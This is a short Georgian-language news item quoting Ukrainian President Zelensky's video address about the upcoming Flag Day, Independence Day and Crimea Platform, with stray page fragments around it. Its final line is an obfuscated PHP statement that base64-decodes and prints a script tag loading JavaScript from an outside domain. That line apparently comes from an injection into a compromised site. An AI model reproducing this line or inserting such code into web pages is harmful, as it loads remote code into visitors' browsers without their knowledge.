celsiusi
ავერსი შნაიდერი
ჩვენ აქტიურად ვემზადებით ახალი კვირისთვის, რომელიც ძალიან მნიშვნელოვანია ყველა ჩვენგანისთვის, ჩვენი ქვეყნისთვის – განაცხადა უკრაინის პრეზიდენტმა ვოლოდიმერ ზელენსკიმ ვიდეომიმართვაში. 
 
"ჩვენ აქტიურად ვემზადებით ახალი კვირისთვის, რომელიც ძალიან მნიშვნელოვანია ყველა ჩვენგანისთვის, ჩვენი ქვეყნისთვის. წინ არის ჩვენი დროშის დღე და ჩვენი დამოუკიდებლობის დღე. წინ არის უკრაინის დამოუკიდებლობისთვის მებრძოლ ომის ვეტერანთა ხსოვნა და ყირიმის პლატფორმა - ეს წელი მართლაც განსაკუთრებულია. წელს პირდაპირი მნიშვნელობით ყირიმის ჰაერში იგრძნობა, რომ იქ ოკუპაცია დროებითია და უკრაინა დაბრუნდება.
 
ჩვენ ყოველთვის გულახდილად ვამბობთ: უკრაინის გამარჯვებისთვის ჯერ კიდევ უნდა ვიბრძოლოთ, ჯერ კიდევ ბევრი რამის გაკეთება, მოთმინება და სამწუხაროდ დიდი ტკივილის გადატანა მოგვიწევს. მაგრამ უკრაინელები სამართლიანად ამაყობენ საკუთარი თავით, ქვეყნითა და გმირებით." – განაცხადა ზელენსკიმ.
 
544
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");